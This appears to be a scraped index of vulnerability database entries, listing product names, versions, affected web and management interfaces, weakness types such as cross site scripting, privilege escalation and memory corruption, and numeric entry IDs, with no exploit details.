Cisco TelePresence Video Communication Server X8.5.1 Web Interface privilege escalation [76654] Cisco Identity Services Engine 1.1(4.1)/1.3(106.146)/1.3(120.135) Web Interface privilege escalation [76301] OpenEMR up to 4.2.0 Web Interface weak authentication [75997] Cisco WebEx Meeting Center Web Admin Interface User information disclosure [75621] Cisco Unified MeetingPlace 8.6(1.9) Web User Interface information disclosure [75409] Cisco Wireless LAN Controller up to 7.0.241/7.4.122/7.6.120 Web Administration Interface privilege escalation [75207] Cisco Unified Communications Manager 11.0(0.98000.225) Administrative Web Interface sql injection [74417] SCADA Engine BACnet OPC up to 2.1.359.21 Web Interface BACnOPCServer.exe privilege escalation [74416] SCADA Engine BACnet OPC up to 2.1.359.21 Web Interface memory corruption [74168] Cisco Prime Infrastructure up to 2.1 Web Interface privilege escalation [72751] Cisco Unified Communications Manager Administrative Web Interface sql injection [71776] IBM Security Access Manager For Web 8.0 up to 8.0.0.1 Management Interface cross site scripting [70828] oVirt up to 3.4.0 Web Admin Interface unknown vulnerability [70382] Cisco Unified Communications Domain Manager up to 8.1 Admin Web Interface Redirect [66838] Siemens Ruggedcom Rugged Operating System up to 3.5.3 Web Management Interface privilege escalation [66262] Media5 Mediatrix Voip Gateway 4402 up to Dgw 1.1.13.186 Web Management Interface cross site scripting [66214] Open-Xchange AppSuite up to 7.4.1 WebDAV Interface directory traversal [65258] Cisco Unified Communications Manager Administrative Web Interface directory traversal [65053] Cisco Video Surveillance Operations Manager Administrative Web Interface weak authentication [64981] Cisco Unified Computing System Administrative Web Interface memory corruption [63281] Cerberus FTP Server up to 2.41 Administrative Web Interface cross site scripting [61250] Cisco Telepresence System Tx9000 1.7.4 Administrative Web Interface privilege escalation [56617] Cisco TelePresence Multipoint Switch 1.0.x Administrative Web Interface privilege escalation [56615] Cisco TelePresence Multipoint Switch 1.6.x Administrative Web Interface memory corruption [54763] Gecad AXIGEN Mail Server up to 7.3 Webmail Interface cross site scripting [51896] Accellion Secure File Transfer Appliance Administrative Web Interface privilege escalation [49906] ZyXEL P-330W router Web Management Interface cross site request forgery [49905] ZyXEL P-330W router Web Management Interface cross site scripting [49192] Cisco Cisco 4200 Wireless Lan Controller up to 5.0 Administrative Web Interface denial of service [48796] Netgear DG632 -/3.4.0 Ap Administrative Web Interface directory traversal [48795] Netgear DG632 3.4.0 Ap Administrative Web Interface weak authentication [48794] Netgear DG632 3.4.0 Ap Administrative Web Interface privilege escalation [48468] Citrix Web Interface 5.0 privilege escalation [46484] Netgear WGR614 V8/V9 Web Management Interface privilege escalation [46359] Rockwell Automation Controllogix 1756-ENBT/A Ethernet/IP Bridge Web Interface Internal information disclosure [41693] F5 BIG-IP 9.4.3 Web Management Interface cross site scripting [41405] Snom 320 SIP Phone Web Interface cross site request forgery [40527] F5 BIG-IP 9.4.3 Web Management Interface list_system.jsp search cross site scripting [39897] Citrix NetScaler 8.0 Web Management Interface information disclosure [39896] Citrix NetScaler 8.0 Web Management Interface weak encryption [38923] IceWarp Merak Mail Server up to 8.9.1 Webmail Interface cross site scripting [38451] Cisco WebEx Meetings Server 1.5 XML Programmatic Interface information disclosure [35113] JBoss JBoss Application Server Web Management Interface privilege escalation [34691] Symantec Web Security up to 3.0.1.84 License Registering Interface denial of service [29894] Asterisk@Home up to 2.7 Web Interface misc/audio.php directory traversal [24948] Argosoft Mail Server 1.8.7.6 Web Interface cross site scripting [24947] Argosoft Mail Server 1.8.7.6 Webmail Interface cross site scripting [23539] Mantis up to 0.10.1 Web Interface information disclosure [22901] Edimax Full Rate ADSL Router AR-6004 Web Management Interface weak authentication [22900] Edimax Full Rate ADSL Router AR-6004 Web Management Interface cross site scripting [22532] Netgear VPN Router FVS318 Web Admin Interface denial of service [21810] Business Objects Crystal Reports 9 Web Interface Disk Exhaustion denial of service [21346] Netgear FM114P 1.4 Beta Release 17 Web Configuration Interface netgear.cfg directory traversal [21286] Aprelium Abyss Web Server up to 1.1.2 Remote Web Management Interface weak authentication [20464] Best Practical Solutions Request Tracker up to 1.0.7 Web Interface cross site scripting [19987] Oracle Application Server 9.0.2 Web Cache Administration Interface Password privilege escalation [19318] Webmin up to 0.92.1 Web Interface cross site scripting [18829] Juniper Netscreen ScreenOS up to 2.6.1/3.0.3 Web Interface denial of service [18381] Oracle9i 9.0/9.0.1 Web Administration Interface privilege escalation [17704] Lotus Domino up to 5.0.8 Web Administration Interface webadmin.ntf privilege escalation [17547] Internet Software Solutions Air Messenger LAN Server 3.4.2 Webpaging Interface directory traversal [17487] Ipswitch IMail 6.0.2/6.0.6/7.0.4 Webmail Interface printmail.cgi memory corruption [16870] Cisco Aironet 340 up to 8.55 Web Interface privilege escalation [15630] Computalynx CMail 2.4.7 Web Interface memory corruption [15629] Computalynx CMail 2.4.7 Web Interface memory corruption [14917] Zeus Technologies Zeus Web Server 3.3.1/3.3.2 Administration Interface weak encryption [13179] Netgear DGN2200 1.0.0.29_1.7.29_hots Web Admin Interface /password.cgi cross site request forgery [13150] Netgear DGN2200 1.0.0.29_1.7.29_hots Web Interface Stored cross site scripting [12617] D-Link DIR-600 2.16ww Web Admin Interface cross site request forgery [12466] Barracuda Firewall 6.1.0.016 Web Interface cross site scripting [12328] Netgear DGN2200 N300 up to 1.0.0.36-7.0.37 Web Interface ping.cgi privilege escalation [12324] Netgear D6300B up to V1.0.0.14_1.0.14 Web Interface diag.cgi privilege escalation [12212] Open-Xchange AppSuite up to 7.4.0 Web Interface cross site scripting [12146] Cisco Secure Access Control System 5.1 Web Interface Authentication Bypass privilege escalation [12035] Red Hat JBoss Web Framework Kit 2.3.0 XML External Entity InterfaceGenerator.java information disclosure [12034] Red Hat JBoss Web Framework Kit 2.3.0 Seam Remoting InterfaceGenerator InterfaceGenerator.java privilege escalation [11781] QNAP QTS 4.0/4.0.3 Web Interface cgi-bin/jc.cgi directory traversal [11327] Palo Alto PAN-OS 5.0.8 Firewall Web Interface Stored cross site scripting [10255] Synology DiskStation Manager 4.3-3776 Web Interface /webman/info.cgi Reflected cross site scripting [10254] Synology DiskStation Manager 4.3-3776 Web Interface /scripts/uistrings.cgi privilege escalation [9555] Cisco Identity Services Engine up to 1.3(0.320) Web Interface cross site request forgery [9528] Cisco Linksys WRT110 Web Interface cross site request forgery [8749] Cisco Secure Access Control System Web Interface weak authentication [8637] OpenVPN 1.8.4 Admin Web Interface cross site request forgery [8540] Cisco Unified Computing System up to 1.4(x)/2.0(1m) Manager Web Interface information disclosure [8460] Belkin N300/N900 Wireless Router 1.00.06/1.00.23 Web Interface util_system.html cross site request forgery [8459] TP-LINK TL-WR1043ND V1_120405 FTP Web Interface denial of service [6297] Novell GroupWise up to 2012 Web Admin Interface gwia.exe Numeric Error [5590] Red Hat Jboss Enterprise Web/Application Platforms up to 5.1.2 on Linux Java Naming/Directory Interface Service privilege escalation [4646] Citrix XenServer up to 1.1.1 Web Self Service Management Interface unknown vulnerability [4256] Linksys WRT54GC 1.02.5/1.02.8/1.05.7 Web Management Interface memory corruption [4222] Citrix Web Interface 5.x cross site scripting [3963] Citrix Web Interface up to 5.0.1 cross site scripting [3519] Citrix Web Interface cross site scripting [2977] Cisco CallManager up to 4.1 Web Interface /CCMAdmin/serverlist.asp cross site scripting [2876] Symantec Web Security up to 3.0.1.85 License Registering Interface denial of service [738] ZyXEL Prestige Router 650HW-31/650R-11 Web Interface Password memory corruption [177010] GitLab 10.5 Webhook server-side request forgery [176953] Schneider Electric Modicon X80 BMXNOR0200H RTU up to SV1.70 IR22 Web Server information disclosure [176919] Advantech WebAccess 8.4.2/8.4.4 bwRoot.asp WADashboard cross site scripting [176860] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SAML Web Inbound Trust Association Interceptor access control [176830] Backdoor.Win32.Zombam.gen HTML Web UI cross site scripting [176829] Backdoor.Win32.Zombam.gen HTML Web UI buffer overflow [176828] Backdoor.Win32.Zombam.gen HTML Web UI command injection [176804] Grant Averett Cerberus FTP Server up to 10.0.18/11.0.3 Web Client cross site scripting [176800] TP-Link TL-SG2005/TL-SG2008 1.0.0 Build 20180529 Rel.40524 Device Description Interface array index [176634] SAP NetWeaver Application Server ABAP 702/731/750/753/755 Web Dynpro ABAP cross site scripting [176632] SAP NetWeaver AS for ABAP 702 up to <=700 Web Survey cross site scripting [176554] GitLab Community Edition/Enterprise Edition 10.5 Webhook server-side request forgery [176534] Squid Web Proxy up to 4.14/5.0.5 HTTP Range Request denial of service [176406] IBM WebSphere Application Server 8.5/9.0 Network Deployment path traversal [176350] Cisco WebEx Player on Windows/macOS WRF File memory corruption [176349] Cisco WebEx Player on Windows/macOS WRF File memory corruption [176348] Cisco WebEx Network Recording Player/WebEx Player ARF/WRF File memory corruption [176345] Cisco WebEx Network Recording Player/WebEx Player ARF/WRF File memory corruption [176341] Cisco WebEx Meetings/WebEx Meetings Server Web UI redirect [176340] Cisco WebEx Meetings Server Multimedia Viewer protection mechanism [176272] IBM Jazz Foundation/Engineering Web UI cross site scripting [176271] IBM Jazz Foundation/Engineering Web UI cross site scripting [176270] IBM Jazz Foundation/Engineering Web UI cross site scripting [176269] IBM Jazz Foundation/Engineering Web UI cross site scripting [176132] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting [176128] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting [176067] Ettercap 0.7.3 GTK Interface ec_gtk_conf.c gtkui_conf_read stack-based overflow [176064] Squid Web Proxy up to 4.14/5.0.5 HTTP Response denial of service [176034] OpenShift 3 Web Console security check for standard [176004] Checkbox Survey up to 6 CheckboxWeb.dll deserialization [175986] Squid Web Proxy up to 4.14/5.0.5 urn Scheme memory allocation [175984] Squid Web Proxy up to 4.14/5.0.5 Response Header denial of service [175983] Squid Web Proxy up to 4.14/5.0.5 Cache Manager API memory leak [175968] Squid Web Proxy up to 4.14/5.0.5 Range Request denial of service [175964] Squid Web Proxy up to 4.14/5.0.5 Range Request denial of service [175878] IBM WebSphere Application Server 8.0/8.5/9.0 XML Data xml external entity reference [175769] Apple macOS up to 11.3 WebRTC null pointer dereference [175768] Apple macOS up to 11.3 WebRTC null pointer dereference [175767] Apple macOS up to 11.3 WebKit unknown vulnerability [175766] Apple macOS up to 11.3 WebKit memory corruption [175765] Apple macOS up to 11.3 WebKit memory corruption [175764] Apple macOS up to 11.3 WebKit cross site scripting [175763] Apple macOS up to 11.3 WebKit information disclosure [175762] Apple macOS up to 11.3 WebKit use after free [175761] Apple macOS up to 11.3 WebKit cross site scripting [175696] Apple tvOS up to 14.5 WebKit integer overflow [175695] Apple tvOS up to 14.5 WebKit unknown vulnerability [175694] Apple tvOS up to 14.5 WebKit memory corruption [175693] Apple tvOS up to 14.5 WebKit memory corruption [175692] Apple tvOS up to 14.5 WebKit cross site scripting [175691] Apple tvOS up to 14.5 WebKit information disclosure [175690] Apple tvOS up to 14.5 WebKit use after free [175689] Apple tvOS up to 14.5 WebKit cross site scripting [175688] Apple tvOS up to 14.5 WebKit memory corruption [175670] Apple watchOS up to 7.4.1 WebKit unknown vulnerability [175669] Apple watchOS up to 7.4.1 WebKit memory corruption [175668] Apple watchOS up to 7.4.1 WebKit memory corruption [175667] Apple watchOS up to 7.4.1 WebKit cross site scripting [175665] Apple watchOS up to 7.4.1 WebKit use after free [175664] Apple watchOS up to 7.4.1 WebKit cross site scripting [175573] IBM Security Guardium 11.2 Web UI cross site scripting [175372] IBM Maximo Asset Management 7.6.0/7.6.1 Web UI cross site scripting [175234] Moxa NPort IA5150A-IEX up to 1.4 Web Console unknown vulnerability [175149] 10Web Mobile-Friendly Image Gallery Plugin up to 1.5.68 on WordPress AJAX Action gallery_id cross site scripting [175106] IBM QRadar User Behavior Analytics up to 4.0.1 Web UI cross site scripting [174820] Microsoft Accessibility Insights for Web information disclosure [174791] F5 BIG-IP ASM up to 12.1.5.2/13.1.3.4/14.1.3.0/15.1.1/16.0.1.0 WebSocket Request denial of service [174784] EC-CUBE 4.0.0 up to 4.0.5 EC Web Site cross site scripting [174765] IBM Cloud Pak for Security 1.5.0.0/1.5.0.1 Web UI cross site scripting [174615] IBM Tivoli Storage Manager 5 Release 2 Command Line Administrative Interface dsmadmc.exe buffer overflow [174568] Cisco SD-WAN vManage Software Cluster Management Interface information disclosure [174515] Apple macOS up to 11.3.0 WebKit integer overflow [174514] Apple macOS up to 11.3.0 WebKit memory corruption [174513] Apple watchOS up to 7.4.0 WebKit memory corruption [174465] IBM QRadar SIEM 7.3/7.4 Web UI cross site scripting [174463] IBM QRadar SIEM 7.3/7.4 Web UI cross site scripting [174324] Cisco Firepower Device Manager Web-based Management resource consumption [174159] IBM Spectrum Scale up to 5.0.5.6/5.1.0.2 Web UI cross site scripting [174130] Advantech WebAccess/SCADA up to 9.0.1 Portal permission assignment [174101] Apple watchOS up to 7.3.3 WebKit Storage use after free [174100] Apple watchOS up to 7.3.3 WebKit initialization [174099] Apple watchOS up to 7.3.3 WebKit cross site scripting [174098] Apple watchOS up to 7.3.3 WebKit memory corruption [174097] Apple watchOS up to 7.3.3 WebKit cross site scripting [174063] Apple tvOS up to 14.4 WebKit Storage use after free [174062] Apple tvOS up to 14.4 WebKit initialization [174061] Apple tvOS up to 14.4 WebKit cross site scripting [174060] Apple tvOS up to 14.4 WebKit memory corruption [174059] Apple tvOS up to 14.4 WebKit cross site scripting [174058] Apple tvOS up to 14.4 WebKit memory corruption [174024] Apple macOS up to 11.2.3 WebRTC use after free [174023] Apple macOS up to 11.2.3 WebKit Storage use after free [174022] Apple macOS up to 11.2.3 WebKit initialization [174021] Apple macOS up to 11.2.3 WebKit cross site scripting [174020] Apple macOS up to 11.2.3 WebKit memory corruption [174019] Apple macOS up to 11.2.3 WebKit cross site scripting [173872] Webmin 1.973 User cross-site request forgery [173871] Webmin 1.973 Process cross site scripting [173870] Webmin 1.973 Process cross-site request forgery [173769] Juniper Junos OS J-Web cross site scripting [173766] Juniper Junos OS J-Web input validation [173761] Juniper Junos OS Web Service allocation of resources [173749] Juniper Junos OS on SRX/vSRX J-web path traversal [173734] Juniper Junos OS IRB Interface memory leak [173623] Oracle PeopleSoft Enterprise PT PeopleTools 8.56/8.57/8.58 Weblogic cross site scripting [173616] Oracle PeopleSoft Enterprise PT PeopleTools 8.56/8.57/8.58 Weblogic deserialization [173559] Oracle JD Edwards EnterpriseOne Tools up to 9.2.4.x Web Runtime cross site scripting [173558] Oracle JD Edwards EnterpriseOne Tools up to 9.2.5.1 Web Runtime cross site scripting [173553] Oracle JD Edwards EnterpriseOne Tools up to 9.2.3.x Web Runtime server-side request forgery [173534] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web General unknown vulnerability [173533] Oracle WebLogic Server Console information disclosure [173532] Oracle WebLogic Server Core information disclosure [173531] Oracle HTTP Server 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Web Listener unknown vulnerability [173526] Oracle WebLogic Server 10.3.6.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Web Services information disclosure [173525] Oracle WebLogic Server 10.3.6.0.0 Console unknown vulnerability [173521] Oracle WebLogic Server Core unknown vulnerability [173520] Oracle WebLogic Server 10.3.6.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core information disclosure [173519] Oracle WebLogic Server 10.3.6.0.0 Core deserialization [173515] Oracle WebLogic Server Proxy Plug-In 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 SSL Module denial of service [173514] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 TopLink Integration information disclosure [173513] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Security Framework denial of service [173495] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Coherence Container unknown vulnerability [173494] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core unknown vulnerability [173493] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Security Framework resource consumption [173465] Oracle Application Testing Suite 13.3.0.1 Load Testing for Web Apps buffer overflow [173444] Oracle Projects 12.1.1 up to 12.2.10 User Interface unknown vulnerability [173300] Wikimedia analytics-quarry-web Content Type app.py cross site scripting [173243] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 XML Data xml external entity reference [173237] IBM WebSphere Application Server 8.0/8.5/9.0 XML Data xml external entity reference [172836] ZEROF Web Server 1.0 Login Page /HandleEvent sql injection [172810] Papoo CMS Light/CMS Pro Admin Interface cross-site request forgery [172681] Aprelium Abyss Web Server 2.12.1/2.14 HTTP Request out-of-bounds read [172671] Forcepoint Web Security Content Gateway up to 8.5.3 XML information disclosure [172660] Web-School ERP up to 5.0 Voucher Payment create cross-site request forgery [172659] Web-School ERP 5.0 Event cross site scripting [172658] Web-School ERP up to 5.0 create student_leave_application cross-site request forgery [172657] Web-School ERP 5.0 Event injection [172654] IBM WebSphere Application Server 7.0/8.0/8.5 server-side request forgery [172639] Cisco Webex Meetings Client on Android Avatar access control [172636] Cisco Webex Meetings cross site scriting [172452] Elementor Website Builder Plugin up to 3.1.3 on WordPress image-box.php cross site scripting [172451] Elementor Website Builder Plugin up to 3.1.3 on WordPress icon-box.php cross site scripting [172450] Elementor Website Builder Plugin up to 3.1.3 on WordPress Saved Pages accordion.php cross site scripting [172449] Elementor Website Builder Plugin up to 3.1.3 on WordPress Saved Pages divider.php cross site scripting [172448] Elementor Website Builder Plugin up to 3.1.3 on WordPress Saved Pages heading.php cross site scripting [172447] Elementor Website Builder Plugin up to 3.1.3 on WordPress column.php cross site scripting [172404] IBM InfoSphere Information Server 11.7 Web UI cross site scripting [172375] Apple tvOS WebKit access control [172374] Apple watchOS WebKit access control [172371] Apple tvOS WebRTC redirect [172370] Apple watchOS WebRTC redirect [172353] Apple tvOS WebKit type confusion [172352] Apple watchOS WebKit type confusion [172350] Apple watchOS WebKit use after free [172349] Apple tvOS WebKit use after free [172138] Linux Kernel up to 5.11.2 Webcam v4l2-ioctl.c video_usercopy memory leak [172114] VMware Carbon Black Cloud Workload Appliance 1.0.0/1.01 Administrative Interface information disclosure [172014] IBM Jazz Foundation Web UI cross site scripting [172013] IBM Jazz Foundation Web UI cross site scripting [172012] IBM Jazz Foundation Web UI cross site scripting [172011] IBM Jazz Foundation Web UI cross site scripting [172008] IBM Jazz Foundation Web UI cross site scripting [172007] IBM Jazz Foundation Web UI cross site scripting [171954] INSMA Wifi Mini Spy 1080P HD Security IP Camera 1.9.7 B WebUI cross-site request forgery [171908] Acexy Wireless-N WiFi Repeater 28.08.06.1 Web Management Administrator Password password recovery [171904] Apple watchOS up to 7.3.2 WebKit cross site scripting [171715] Cisco IOS XE Web UI command injection [171709] Cisco IOS XE Web UI path traversal [171700] Cisco IOS XE Websocket insufficient verification of data authenticity [171683] Cisco IOS XE Web UI denial of service [171680] Cisco IOS XE Web UI denial of service [171468] Squid Web Proxy up to 4.13/5.0.4 Config Setting uri_whitespace request smuggling [171457] Advantech WebAccess/SCADA up to 9.0 cross site scripting [171415] 10Web Photo Gallery Plugin model.php sql injection [171408] Slider by 10Web Plugin up to 1.2.35 on WordPress bulk_action/export_full/save_slider_db sql injection [171284] Moodle up to 3.5.16/3.8.7/3.9.4/3.10.1 Web Service authorization [171262] Barracuda Web Application Firewall Online Demo Certificate FFM-SSLspect denial of service [171208] Synology DiskStation Manager Web Request iscsi_snapshot_comm_core out-of-bounds read [171207] Synology DiskStation Manager Web Request iscsi_snapshot_comm_core use after free [171205] Barracuda Web Application Firewall Online Demo /cgi-mod/lookup.cgi ldap injection [171203] Apple macOS up to 11.2.2 WebKit memory corruption [171202] Apple watchOS up to 7.3.1 WebKit memory corruption [171148] IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 Web UI cross site scripting [171071] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 JAX-RPC Application path traversal [171065] Netgear JGS516PE/GS116Ev2 2.6.0.43 Web Administration Panel integer overflow [171063] Netgear JGS516PE/GS116Ev2 2.6.0.43 Administration Web Panel cross site scripting [171062] Netgear JGS516PE/GS116Ev2 2.6.0.43 Administration Web Panel buffer overflow [171058] Netgear JGS516PE/GS116Ev2 2.6.0.43 Web Administration Panel cross-site request forgery [171030] ExpressVPN Router 1 Nginx Webserver integer overflow [170974] Microsoft SharePoint Server/Office Web Apps 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [170973] Microsoft SharePoint Server/Office Web Apps 2016/2019 information disclosure [170969] Microsoft Office 365 Apps for Enterprise up to Web Apps 2013 SP1 unknown vulnerability [170903] Squid Web Proxy up to 4.14/5.0.5 WCCP Protocol out-of-bounds read [170836] GLPI up to 9.5.3 Self-Service Interface authorization [170420] Backdoor.Win32.Ketch.h Web Server buffer overflow [170413] Backdoor.Win32.Agent.aak Web Service Port 8080 hard-coded credentials [170403] Nagios XI up to 5.6 Web System graphtemplates.php code injection [170304] Advantech WebAccess/SCADA up to 9.0 WADashboard external reference [170259] Automated Logic WebCTRL up to 6.5 GET Request failuremessage.jsp cross site scripting [170216] Digium Asterisk up to 16.16.0/17.9.1/18.2.0 WebRTC Client res_rtp_asterisk.c stack-based overflow [170208] Sangoma Asterisk up to 16.8-cert5/16.16.0/17.9.1/18.2.0 WebRTC Client res_rtp_asterisk.c stack-based overflow [170199] Johnson Controls Metasys Reporting Engine up to 2.1 Web Services path traversal [170154] IBM Maximo for Civil Infrastructure 7.6.2 Web UI cross site scripting [170152] IBM Maximo for Civil Infrastructure 7.6.2 Web UI cross site scripting [170150] IBM WebSphere Application Server 8.0/8.5/9.0 path traversal [170149] IBM Jazz Reporting Service 6.0.6.1/7.0/7.0.1/7.0.2 Web UI cross site scripting [170124] Advantech WebAccess/SCADA 9.0.1 COM Server access control [170123] Advantech WebAccess/SCADA 9.0.1 Loaded Module access control [170122] Advantech WebAccess/SCADA 9.0.1 Services access control [170121] Advantech WebAccess/SCADA 9.0.1 access control [170120] Advantech WebAccess/SCADA 9.0.1 HTTP Request information disclosure [170046] Intel Collaboration Suite for WebRTC up to 4.3.0 API control flow [169949] Dell EMC Avamar Server 19.3/19.4 Web UI improper authorization [169935] Nagios XI 5.7.2 Webapp Query command injection [169923] Horde Groupware Webmail Edition up to 5.2.22 Text Filter Library Text2html.php preProcess cross site scripting [169907] F5 BIG-IP ASM/Advanced WAF up to 12.1.x/13.1.3.5/14.1.3.0/15.1.1/16.0.1.0 Websocket resource consumption [169795] IBM Case Manager/Business Automation Workflow Web UI cross site scripting [169782] Teradici Cloud Access Connector up to 31 Web Form cross-site request forgery [169781] Teradici Cloud Access Connector up to 17 Web Application Pages authentication bypass [169700] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 xml external entity reference [169373] OTRS Survey up to 6.0.20/7.0.19 Agent Interface cross site scripting [169313] Redwood Report2Web 4.3.4.5/4.5.3 default.htm injection [169312] Redwood Report2Web 4.3.4.5/4.5.3 sign.do cross site scripting [169221] Cisco WebEx Meetings/WebEx Meetings Server Meeting Invitation Email input validation [169205] IBM API Connect up to 10.0.1.0/2018.4.1.13 Web UI cross site scripting [169166] Alt-N MDaemon Webmail 19.5.5 Contact List cross site scripting [169165] Alt-N MDaemon Webmail 19.5.5 File Attachment cross site scripting [169121] Apple macOS up to 11.1 WebRTC redirect [169120] Apple macOS up to 11.1 WebKit unknown vulnerability [169119] Apple macOS up to 11.1 WebKit unknown vulnerability [169118] Apple macOS up to 11.1 WebKit type confusion [169117] Apple macOS up to 11.1 WebKit access control [169116] Apple macOS up to 11.1 WebKit access control [169115] Apple macOS up to 11.1 WebKit use after free [168877] Moodle up to 3.8.6/3.9.3/3.10.0 Web Services information disclosure [168831] IBM Jazz Foundation Web UI cross site scripting [168826] IBM Jazz Foundation Web UI cross site scripting [168825] IBM Jazz Foundation Web UI cross site scripting [168824] IBM Cloud Pak for Security 1.4.0.0 Web UI cross site scripting [168816] IBM Jazz Foundation Web UI cross site scripting [168727] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 XML Data xml external entity reference [168352] Oracle JD Edwards EnterpriseOne Tools up to 9.2.4.x Web Runtime cross site scripting [168335] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Web Services information disclosure [168332] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core Components denial of service [168329] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web Dashboards unknown vulnerability [168328] Oracle WebLogic Server 12.2.1.3.0 Centralized Thirdparty Jars denial of service [168326] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps cross site scripting [168325] Oracle WebCenter Sites 12.2.1.3.0/12.2.1.4.0 cross site scripting [168322] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Web Services unknown vulnerability [168321] Oracle WebLogic Server Sample apps unknown vulnerability [168317] Oracle WebLogic Server Console unknown vulnerability [168316] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console deserialization [168315] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Security Framework deserialization [168303] Oracle BI Publisher 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Web Server unknown vulnerability [168297] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web General unknown vulnerability [168290] Oracle WebLogic Server Samples unknown vulnerability [168289] Oracle WebLogic Server 12.1.3.0.0 Core Components unknown vulnerability [168288] Oracle WebLogic Server 12.1.3.0.0 Core Components unknown vulnerability [168287] Oracle WebLogic Server Core Components unknown vulnerability [168286] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Web Services unknown vulnerability [168285] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Core Components unusual condition [168284] Oracle WebCenter Portal 11.1.1.9.0 Portlet Services xml external entity reference [168235] Oracle Financial Services Market Risk Measurement and Management User Interface dynamically-determined object attributes [168234] Oracle Financial Services Data Integration Hub 8.0.3/8.0.6 User Interface dynamically-determined object attributes [168223] Oracle Enterprise Manager Ops Center 12.4.0.0 User Interface cryptographic issues [168222] Oracle Application Testing Suite 13.3.0.1 Load Testing for Web Apps cross site scripting [168220] Oracle Application Testing Suite 13.3.0.1 Load Testing for Web Apps xml external entity reference [168184] Oracle Primavera P6 Enterprise Project Portfolio Management Web access unknown vulnerability [168063] Atlassian FishEye/Crucible up to 4.8.4 web-inf/ file access [168044] Juniper Junos on QFX IRB Interface denial of service [168039] Juniper Junos 802.1X Authenticator Port Interface resource consumption [168036] Juniper Junos J-Web information disclosure [168004] Backdoor.Win32.Ncx.bt Web Server buffer overflow [167945] Cisco WebEx Meetings/WebEx Meetings Server Host Key excessive authentication [167753] IBM API Connect up to 5.0.8.10 Web UI cross site scripting [167547] Apache DolphinScheduler up to 1.3.2 API Interface access control [167510] IBM Jazz Foundation Web UI cross site scripting [167509] IBM Jazz Foundation Web UI cross site scripting [167508] IBM Jazz Foundation Web UI cross site scripting [167447] AWBS Advanced Webhost Billing System 3.7.0 cross-site request forgery [167352] Elementor Website Builder Plugin up to 3.0.13 on WordPress unrestricted upload [167339] IBM WebSphere eXtreme Scale 8.6.1 URL Parameter information disclosure [167247] IBM Cloud Pak System 2.3.0.1 up to 2.3.3.2 Web UI cross site scripting [167244] IBM Cloud Pak System 2.3.0.1 up to 2.3.3.2 Web UI cross site scripting [167243] IBM Cloud Pak System 2.3.0.1 up to 2.3.3.2 Web UI cross site scripting [167175] Webform Report Project up to 7.x-1.x-dev on Drupal Submission /rss.xml information disclosure [162178] IBM WebSphere Application Server 7.5/8.0/8.5/9.0 information disclosure [162118] CMS Made Simple up to 2.2.14 moduleinterface.php cross site scripting [161959] Apple iCloud up to 11.3 on Windows WebKit Universal cross site scripting [161958] cPanel up to 90.0.9 Cron Editor Interface cross site scripting [161957] cPanel up to 90.0.9 Cron Jobs interface cross site scripting [161956] cPanel up to 90.0.9 WHM Manage API Tokens Interface cross site scripting [161954] cPanel up to 90.0.9 WHM Edit DNS Zone Interface cross site scripting [161953] cPanel up to 88.0.12 DNS Zone Manager DNSSEC Interface cross site scripting [161904] Cisco IOS XE Web Server Authentication privilege escalation [161884] Cisco IOS XE Web Management Framework privilege escalation [161883] Cisco IOS XE Web Management Framework privilege escalation [161878] Cisco IOS XE Web Management Framework privilege escalation [161865] Cisco IOS XE Web UI privilege escalation [161859] Cisco IOS XE Web Management privilege escalation [161769] Cisco Web Security Appliance API Framework Header Injection privilege escalation [161768] Cisco WebEx UCF File privilege escalation [161756] Cisco IOS/IOS XE Web UI cross site request forgery [161744] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161743] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161742] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161685] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 XML Data XML External Entity [161684] IBM WebSphere Application Server Liberty up to 20.0.0.9 oAuth/openidConnectServer denial of service [161643] D-Link DIR-816L/DIR-803 URL Encoding webinc/js/info.php cross site scripting [161630] Citrix ADC/Gateway/NetScaler Gateway/SD-WAN WANOP SSL VPN Web Portal cross site scripting [161369] Apple tvOS up to 13.4.8 WebKit cross site scripting [161365] Apple watchOS up to 6.2.8 WebKit cross site scripting [161292] McAfee Web Gateway up to 9.2.0 Access Control privilege escalation [161284] McAfee Web Gateway up to 9.2.0 Configuration File privilege escalation [161283] McAfee Web Gateway up to 9.2.0 Access Control privilege escalation [161281] 